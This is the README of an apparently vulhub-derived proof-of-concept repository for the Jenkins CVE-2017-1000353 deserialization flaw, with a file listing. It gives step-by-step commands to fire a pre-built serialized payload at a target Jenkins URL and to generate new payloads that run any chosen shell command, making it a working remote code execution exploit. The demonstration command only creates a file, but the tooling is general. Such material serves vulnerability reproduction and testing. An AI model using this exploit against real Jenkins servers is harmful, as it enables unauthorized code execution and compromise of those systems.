jenkins CVE-2017-1000353 POC# CVE-2017-1000353 POC
How to reproduce the Jenkins CVE-2017-1000353?
Clone this repository, use the pre-built payload `jenkins_poc.ser` with flowing command:
```
python exploit.py http://your-ip:8080 jenkins_poc.ser
```
Then the `touch /tmp/success` would be executed.
How to generate the payload `jenkins_poc.ser`?
Download [CVE-2017-1000353-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar).
```
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
```
Referer:
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
[4.0K] /data/pocs/ada29b9ee00ba3da741b59fa94f99a82a00fd0fc
├── [ 80] CVE20171000353.iml
├── [2.0K] exploit.py
├── [2.4K] jenkins_poc.ser
├── [2.7K] pom.xml
├── [ 648] README.md
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] org
└── [4.0K] vulhub
└── [5.8K] Payload.java
5 directories, 6 files